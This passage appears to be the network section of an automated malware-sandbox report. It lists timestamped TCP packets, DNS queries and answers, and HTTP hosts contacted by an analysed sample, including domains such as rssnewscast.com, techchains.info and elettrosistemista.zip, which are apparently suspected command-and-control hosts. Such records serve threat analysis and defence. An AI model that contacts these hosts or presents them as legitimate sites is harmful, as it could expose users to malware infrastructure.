                                                                                      Dec 6, 2024 17:44:08.879355907 CET4985680192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:08.999406099 CET8049856116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:08.999439001 CET8049856116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:10.395468950 CET4985680192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:10.415050983 CET8049856116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:10.415278912 CET4985680192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:10.418417931 CET8049856116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:10.418487072 CET4985680192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:10.518749952 CET8049856116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:10.518807888 CET4985680192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:11.413800955 CET4986580192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:11.533952951 CET8049865116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:11.534342051 CET4986580192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:11.536209106 CET4986580192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:11.656635046 CET8049865116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:13.060348034 CET8049865116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:13.060626984 CET8049865116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:13.060877085 CET4986580192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:13.063066959 CET4986580192.168.2.9116.50.37.244
                                                                                      Dec 6, 2024 17:44:13.182823896 CET8049865116.50.37.244192.168.2.9
                                                                                      Dec 6, 2024 17:44:26.845880032 CET4990180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:26.965900898 CET804990185.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:26.965985060 CET4990180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:26.968638897 CET4990180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:27.088593960 CET804990185.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:28.473623037 CET4990180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:28.644140005 CET804990185.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:28.644246101 CET4990180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:29.493033886 CET4990880192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:29.616705894 CET804990885.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:29.616991997 CET4990880192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:29.619647026 CET4990880192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:29.739646912 CET804990885.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:31.129875898 CET4990880192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:31.252083063 CET804990885.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:31.252162933 CET4990880192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:32.155410051 CET4991580192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:32.275402069 CET804991585.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:32.275495052 CET4991580192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:32.277421951 CET4991580192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:32.398169994 CET804991585.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:32.399266958 CET804991585.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:33.786012888 CET4991580192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:33.906342030 CET804991585.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:33.906400919 CET4991580192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:34.804649115 CET4992180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:34.924614906 CET804992185.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:44:34.927566051 CET4992180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:34.931458950 CET4992180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:44:35.051836014 CET804992185.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:45:36.259124994 CET804992185.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:45:36.259242058 CET804992185.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:45:36.259355068 CET4992180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:45:36.262116909 CET4992180192.168.2.985.159.66.93
                                                                                      Dec 6, 2024 17:45:36.382164001 CET804992185.159.66.93192.168.2.9
                                                                                      Dec 6, 2024 17:45:41.643601894 CET4998380192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:41.763391972 CET804998391.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:41.763485909 CET4998380192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:41.765894890 CET4998380192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:41.885740995 CET804998391.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:43.060255051 CET804998391.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:43.060302019 CET804998391.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:43.060463905 CET4998380192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:43.306164980 CET4998380192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:44.320291996 CET4998480192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:44.440478086 CET804998491.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:44.440639973 CET4998480192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:44.442523003 CET4998480192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:44.562493086 CET804998491.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:45.722722054 CET804998491.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:45.722784996 CET804998491.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:45.722939014 CET4998480192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:45.958084106 CET4998480192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:46.978069067 CET4998580192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:47.098726988 CET804998591.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:47.098872900 CET4998580192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:47.101723909 CET4998580192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:47.221987009 CET804998591.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:47.222244978 CET804998591.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:48.379008055 CET804998591.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:48.474560976 CET804998591.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:48.474627018 CET4998580192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:48.614408970 CET4998580192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:49.632991076 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:49.754121065 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:49.754219055 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:49.756489992 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:49.876722097 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066564083 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066622972 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066634893 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066775084 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066795111 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066809893 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066807985 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.066822052 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066833973 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066864014 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.066922903 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.066951990 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.066994905 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.067667961 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.186558962 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.186752081 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.187022924 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.190866947 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.239619970 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.259151936 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.259641886 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.263556004 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.263663054 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.263696909 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.263782024 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.271640062 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.271758080 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.271859884 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.280194998 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.280216932 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.280339003 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.282816887 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.404274940 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:46:05.289267063 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:05.410778999 CET804998766.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:05.411163092 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:05.415682077 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:05.535458088 CET804998766.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:06.655134916 CET804998766.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:06.655426025 CET804998766.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:06.655498981 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:06.929729939 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:07.946571112 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:08.067594051 CET804998866.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:08.067689896 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:08.070110083 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:08.191962957 CET804998866.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:09.324565887 CET804998866.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:09.324588060 CET804998866.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:09.331669092 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:09.583143950 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:10.602272987 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:10.722110987 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:10.722291946 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:10.727907896 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:10.847908974 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:10.847935915 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:11.955743074 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:11.955760956 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:11.955816031 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:12.243163109 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:13.257879972 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:13.377767086 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:13.377885103 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:13.379751921 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:13.499773979 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:14.624983072 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:14.625142097 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:14.625193119 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:14.628947020 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:14.748759985 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:20.624509096 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:20.744352102 CET8049991195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:20.744446993 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:20.746615887 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:20.867253065 CET8049991195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:22.053769112 CET8049991195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:22.053940058 CET8049991195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:22.053992033 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:22.255100012 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:23.274930954 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:23.395298004 CET8049992195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:23.395504951 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:23.397727013 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:23.520788908 CET8049992195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:24.732732058 CET8049992195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:24.732815981 CET8049992195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:24.732882023 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:24.911309004 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:25.959275007 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:26.079421043 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:26.079508066 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:26.113141060 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:26.233969927 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:26.233987093 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:27.414124966 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:27.414145947 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:27.414247990 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:27.630332947 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:28.648845911 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:28.768996000 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:28.769172907 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:28.801249981 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:28.921053886 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:30.078202963 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:30.078358889 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:30.078407049 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:30.081250906 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:30.201600075 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:52.229465961 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:52.349587917 CET8049995217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:52.349673986 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:52.352096081 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:52.472424030 CET8049995217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:53.552764893 CET8049995217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:53.553792953 CET8049995217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:53.553951979 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:53.864525080 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:54.883747101 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:55.003698111 CET8049996217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:55.006089926 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:55.010230064 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:55.130856991 CET8049996217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:56.209917068 CET8049996217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:56.210196972 CET8049996217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:56.210278034 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:56.527884007 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:57.539242983 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:57.659693003 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:57.661837101 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:57.665819883 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:57.786062956 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:57.786082983 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:58.878333092 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:58.878717899 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:58.878865004 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:59.182018042 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:00.195631027 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:00.315506935 CET8049998217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:47:00.315593004 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:00.317390919 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:00.437170982 CET8049998217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:47:01.524945974 CET8049998217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:47:01.525216103 CET8049998217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:47:01.525321960 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:01.527503967 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:01.647414923 CET8049998217.196.55.202192.168.2.9

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 6, 2024 17:43:36.707715034 CET6468053192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:43:37.474148989 CET53646801.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:43:54.166193962 CET5228553192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:43:54.573400021 CET53522851.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:44:02.664020061 CET5296953192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:44:03.442640066 CET53529691.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:44:18.070883989 CET5272753192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:44:18.304300070 CET53527271.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:44:26.367794037 CET5067253192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:44:26.843280077 CET53506721.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:45:41.275595903 CET5699053192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:45:41.638171911 CET53569901.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:45:56.289419889 CET5402153192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:45:56.527445078 CET53540211.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:04.602319956 CET5647353192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:05.286708117 CET53564731.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:19.639329910 CET5701353192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:20.621354103 CET53570131.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:35.087032080 CET5516553192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:35.371536016 CET53551651.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:43.431718111 CET6254453192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:43.660933971 CET53625441.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:51.727884054 CET5438053192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:52.226324081 CET53543801.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:47:06.540668011 CET5561253192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:47:06.772746086 CET53556121.1.1.1192.168.2.9

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Dec 6, 2024 17:43:36.707715034 CET192.168.2.91.1.1.10x9a5eStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:43:54.166193962 CET192.168.2.91.1.1.10x700eStandard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:44:02.664020061 CET192.168.2.91.1.1.10x86e7Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:44:18.070883989 CET192.168.2.91.1.1.10xdd20Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:44:26.367794037 CET192.168.2.91.1.1.10xd3a6Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:45:41.275595903 CET192.168.2.91.1.1.10xa19eStandard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:45:56.289419889 CET192.168.2.91.1.1.10xe4dbStandard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:04.602319956 CET192.168.2.91.1.1.10x508Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:19.639329910 CET192.168.2.91.1.1.10xfc27Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:35.087032080 CET192.168.2.91.1.1.10x2e6Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:43.431718111 CET192.168.2.91.1.1.10xd579Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:51.727884054 CET192.168.2.91.1.1.10x6a38Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:47:06.540668011 CET192.168.2.91.1.1.10x705dStandard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Dec 6, 2024 17:43:01.612446070 CET1.1.1.1192.168.2.90xfc0eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 6, 2024 17:43:01.612446070 CET1.1.1.1192.168.2.90xfc0eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:43:37.474148989 CET1.1.1.1192.168.2.90x9a5eNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:43:54.573400021 CET1.1.1.1192.168.2.90x700eName error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:44:03.442640066 CET1.1.1.1192.168.2.90x86e7No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:44:18.304300070 CET1.1.1.1192.168.2.90xdd20Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:44:26.843280077 CET1.1.1.1192.168.2.90xd3a6No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 6, 2024 17:44:26.843280077 CET1.1.1.1192.168.2.90xd3a6No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 6, 2024 17:44:26.843280077 CET1.1.1.1192.168.2.90xd3a6No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:45:41.638171911 CET1.1.1.1192.168.2.90xa19eNo error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:45:56.527445078 CET1.1.1.1192.168.2.90xe4dbName error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:05.286708117 CET1.1.1.1192.168.2.90x508No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:20.621354103 CET1.1.1.1192.168.2.90xfc27No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:20.621354103 CET1.1.1.1192.168.2.90xfc27No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:35.371536016 CET1.1.1.1192.168.2.90x2e6Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:43.660933971 CET1.1.1.1192.168.2.90xd579Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:52.226324081 CET1.1.1.1192.168.2.90x6a38No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 6, 2024 17:46:52.226324081 CET1.1.1.1192.168.2.90x6a38No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                      Dec 6, 2024 17:47:06.772746086 CET1.1.1.1192.168.2.90x705dName error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.3xfootball.com
                                                                                      • www.goldenjade-travel.com
                                                                                      • www.magmadokum.com
                                                                                      • www.rssnewscast.com
                                                                                      • www.techchains.info
                                                                                      • www.elettrosistemista.zip
                                                                                      • www.empowermedeco.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
